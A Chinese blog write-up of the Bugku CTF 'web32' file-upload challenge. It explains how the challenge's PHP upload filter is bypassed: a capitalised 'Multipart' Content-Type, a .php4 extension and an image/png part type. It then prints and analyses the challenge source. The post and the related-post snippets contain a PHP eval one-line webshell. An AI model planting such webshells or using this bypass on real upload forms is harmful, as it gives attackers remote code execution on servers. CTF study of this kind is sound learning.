【bugku】web32 文件上传

最新推荐文章于 2024-08-10 02:34:02 发布
最新推荐文章于 2024-08-10 02:34:02 发布
阅读量923 收藏 5
点赞数 1
分类专栏: Web刷题记录 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/111630819
版权

题目

题目进去后,是一个上传界面,题目也只提示了文件上传,就是考传shell。
然后做了一天,都没做出来,发现自己真的是太菜了!bugku也是刚开始更题,完全没有这道题的writeup,整个人都裂开。最后求助了一下大佬,才做出来的,到这里记录一下。
先放放一句话:

<script language=php>eval($_POST['cmd']);</script>

跟普通的一句话没什么区别,但有一点非常奇妙的一点,它需要将这条头部Content-Type: multipart/form-data;中的multipart改成Multipart,即Content-Type: Multipart/form-data;,再将上传文件的后缀改成php4,最后再改改Content-Type: image/png,就能够成功上传文件。很奇妙是吧,是挺奇妙的,网上也找不到为什么(说白了就是菜)。如果有大佬知道为什么请务必教教小弟!!!
在这里插入图片描述
最后我用的蚁剑来连接,flag在根目录下。
——————————————————————————————————————————————————
后来有大佬教了我做事,说都上了马了自己不会扒来看嘛,哇我真的是蠢,这都没想到,直接血的教训记了下来,并扒了源码分析:

<html>
<body>
<?php 
$flag = "flag{test}"
?>
<form action="index.php" method="post" enctype="multipart/form-data">
My name is margin,give me a image file not a php<br>
<br>
<input type="file" name="file" id="file" /> 
<input type="submit" name="submit" value="Submit" />
</form>
<?php
function global_filter(){
 $type =  $_SERVER["CONTENT_TYPE"];
 if (strpos($type,"multipart/form-data") !== False){
  $file_ext =  substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.')+1);
        $file_ext = strtolower($file_ext);
  if (stripos($file_ext,"php") !== False){
   die("Invalid File<br />");
  }
 }
}
?>


<?php

global_filter();
if ((stripos($_FILES["file"]["type"],'image')!== False) && ($_FILES["file"]["size"] < 10*1024*1024)){
 if ($_FILES["file"]["error"] == 0){
  $file_ext =  substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.')+1);
        $file_ext = strtolower($file_ext);
        $allowexts = array('jpg','gif','jpeg','bmp','php4');
        if(!in_array($file_ext,$allowexts)){
            die("give me a image file not a php");
        }
  $_FILES["file"]["name"]="bugku".date('dHis')."_".rand(1000,9999).".".$file_ext;

     if (file_exists("upload/" . $_FILES["file"]["name"])){
      echo $_FILES["file"]["name"] . " already exists. <br />";
     }
     else{
      if (!file_exists('./upload/')){
       mkdir ("./upload/");
                system("chmod 777 /var/www/html/upload");
      }
      move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $_FILES["file"]["name"]);
                echo "Upload Success<br>";
                $filepath = "upload/" . $_FILES["file"]["name"];
        echo "Stored in: " ."< a href='" . $filepath . "' target='_blank'>" . $filepath . "<br />";
     }
 }
}
else{
 if($_FILES["file"]["size"] > 0){
  echo "You was catched! :) <br />";
 }
}
?>
</body>
</html>

先看看这部分

<?php
function global_filter(){
 $type =  $_SERVER["CONTENT_TYPE"];
 if (strpos($type,"multipart/form-data") !== False){
  $file_ext =  substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.')+1);
        $file_ext = strtolower($file_ext);
  if (stripos($file_ext,"php") !== False){
   die("Invalid File<br />");
  }
 }
}
?>

这里判断multipart/form-data用了strpos,该函数区分大小写,所以用Multipart/form-data的理由找到了,这样就能绕过里面的if,检测php就没用了,再看下一部分:

if ((stripos($_FILES["file"]["type"],'image')!== False) && ($_FILES["file"]["size"] < 10*1024*1024)){
 if ($_FILES["file"]["error"] == 0){
  $file_ext =  substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.')+1);
        $file_ext = strtolower($file_ext);
        $allowexts = array('jpg','gif','jpeg','bmp','php4');
        if(!in_array($file_ext,$allowexts)){
            die("give me a image file not a php");
        }

这里定了个白名单,只漏了个php4出来,只能用php4的原因也找到了,我只能说这道题真奇妙。

小 白 萝 卜
关注
专栏目录
bugku web32 文件上传
濯君
12-30 1732
打开实验,发现是文件上传 只能上传图像,不能上传PHP文件,那应该是寻找漏洞上传PHP文件 PHP文件里写入一句话木马 <?php @eval($_POST[caidao]);?> 使用burp抓包,不断尝试发现发现需要修改的地方有三个,一个是http head里的 Content-Type: multipart/form-data; multipart中的部分字母改成大写的。 第二个是文件的的Content-Type: application/octet-stream,改成image/j.
bugku 文件上传
hintll的博客
06-16 5176
bugku 文件上传 今天将一道很无语的题: 首先是这道题要花五个金币,但是做出来了也才有四个金币,那么这道题做了还亏1个金币 打开场景以后: 就是一个普通的文件上传的页面 先传一个php试一下 回显的也是大概就是文件的格式不合法 那就试一下php4、php5、php6和phtml 还是一样的回显 看一下前端的源码: 检查了一下发现前端没有过滤 那应该就是后端过滤了 这题最无语的地方就是这里了 后端的源码只有传木马后才能看到 但是没有后端的源码又不知道怎么改包传木马 那就先看后端的源码吧: 看了源码后直接传
bugku_writeup】web32 文件上传
kkza的博客
01-02 363
点进去,有一个文件上传功能,且经试验,只能上传jpg文件 由于有文件地址显现,所以这应该是一个文件上传漏洞 上传php一句话木马,然后抓包修改后缀,无效,应该是后端验证 接着修改请求包,文件类型等 上传成功 接下来就可以自由发挥了,打开蚁剑 成功 然后找到根目录,发现有flag get it ...
BugKu CTF Misc:眼见非实 & 啊哒 & ping & Snowfall
最新发布
Flag少侠的博客
08-10 8787
BugKu是一个由乌云知识库(wooyun.org)推出的在线漏洞靶场。乌云知识库是一个致力于收集、整理和分享互联网安全漏洞信息的社区平台。BugKu旨在提供一个实践和学习网络安全的平台,供安全爱好者和渗透测试人员进行挑战和练习。它包含了各种不同类型的漏洞场景,如Web漏洞、系统漏洞、密码学等,参与者需要通过解决这些漏洞来获取Flag。
bugku-web-文件上传
m0_57954651的博客
11-02 1968
不可以上传 php文件 说明一共存在三个过滤 请求头部的 Content-Type 文件后缀 请求数据的Content-Type
bugku-web-文件上传-个人笔记
sunquan705的博客
11-10 678
bugku-web-文件上传-个人笔记
BugKu_文件上传
Kobalos的博客
09-16 676
直接访问目标地址,发现他给了一个上传点 看到他的提示让上传一个图片,不能上传php,那就先上传一个正常图片看看是什么样子的 可以看到上传成功后是直接给出上传后的地址的,并且还给出了超链接,那么来尝试一下上传木马 直接爆破后缀,失败,尝试绕过限制 讲请求包中的Content-Type: multipart/form-data,修改成Content-Type: Multipart/form-data(将m大写),再次爆破后缀名,发现php4上传成功了 掏出蚁剑尝试连接shell 成功getshel.
Bugku web——文件包含2
qq_40481505的博客
10-16 948
打开链接,看到链接形式为file=hello.php,因此首先尝试php文件包含 php://filter/read=convert.base64-encode/resource/hello.php 报错 php://input 报错 file://var/www/hello.php 没有报错,但也没有输出 data: text/plain,<?php echo 123; ?> ...
BugkuCTF-WEB题文件上传
am_03的博客
09-08 1907
启动场景 发现是文件上传 只能上传图像,不能上传PHP文件,那应该是寻找漏洞上传PHP文件 PHP文件里写入一句话木马 <?php @eval($_POST[caidao]);?> 使用burp抓包,不断尝试发现发现需要修改的地方有三个: 一个是http head里的Content-Type: multipart/form-data; 请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如 mulTipart/form-data (其t为大写) Multipart里的部分字母
Bugku Web CTF-文件包含2
No Title
12-31 457
Bugku Web CTF-文件包含2 打开是一个页面,题目提示是文件包含,url的格式也很典型: http://123.206.31.85:49166/index.php?file=hello.php 尝试最简单的思路http://123.206.31.85:49166/index.php?file=../../../../../../../../../etc/pass,然后页面显示大字NA...
BugKu_WEB_(1)
young的博客
07-21 1025
BugKu平台练习wp
三十八、bugku文件上传
山兔的博客
09-05 614
打开网页,看到 My name is margin,give me a image file not a php,盲猜是文件上传。 打开F12,没发现什么东西,看一下评论,做一句话木马,然后将http请求头中的Content-Type:multipart/form-data 修改为Content-Type: Multipart/form-data,且上传的文件后缀名为.php4。 上传,蚂蚁连接,在根目录下获得FLAG。 查看源码,得知global_filter()函数判断“multipart/form-d
bugku——Flask_FileUpload
yc20030119的博客
08-21 797
照例先检查一下源代码(显示文件只能通过jpg或者png进行上传,并且是用python进行返回)那条件都了解了,接下来就是写对应的文件了(我用笔记本写的相对应的文件)第一个文件上传结果为目录(惊奇的发现里面有flag文件)然后将文件的后缀名改成png结尾的文件。第二个文件(text1)然后将两个文件分别上传。第一个文件(text)
Bugku WEB 文件上传(两种方式)
qq_41696858的博客
07-19 636
这题是纯黑盒测试,没有捷径可走,只能不停的试验 <?php function global_filter(){ $type = $_SERVER["CONTENT_TYPE"]; if (strpos($type,"multipart/form-data") !== False){ $file_ext = substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.')+1); $file_ext
Bugku-WEB-web32
fallingskies
01-01 245
根据提示为文件上传 写一个shell.php <?php @eval($_POST[cmd]);?> 上传,抓包 显示invalid file 一共三个过滤 请求头部的 Content-Type 文件后缀 请求数据的Content-Type 请求头部的Content-Type采用大小写绕过 php语言除了可以解析以php为后缀的文件,还可以解析php2,php3、php4、php5这些后缀的文件, 请求数据的Content-Type改成 image/jpeg 小提示..
文件上传bugku
ndjnddjxn的博客
04-19 644
Flask是一个较小的Python web框架,只提供了一个强劲的核心,其他的功能都需要使用拓展来实现。意味着可以根据自己的需求量身打造,一般来说就是利用它来搭建网站。Flask的核心组件包括Werkzeug,一个WSGI工具箱,以及Jinja2,一个模板引擎。Flask使用BSD授权,这意味着它遵循开源许可证,允许用户自由地使用、修改和分发分析:首先对于这个有flask构建的web文件上传程序,其中包含了一个文件上传的端点 /uploader。
bugku 文件上传2
小白渣的博客
09-16 420
这题打开发现是404 我是懵逼的 然后我就想用御剑扫一下后台 结果 咦~ 发现了一个zip文件 然后打开一看flag就在 这个文件中 好像有点简单~~
bugku文件包含2
09-25
首先,可以通过上传文件并抓包的方式来实现文件包含。通过修改参数content-type为image/jpeg filename="1.php:.jpg",可以获取到文件路径。 然后,访问返回的路径,可以看到一串字符,其中包含了一个.txt文件。通过...
评论 17
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值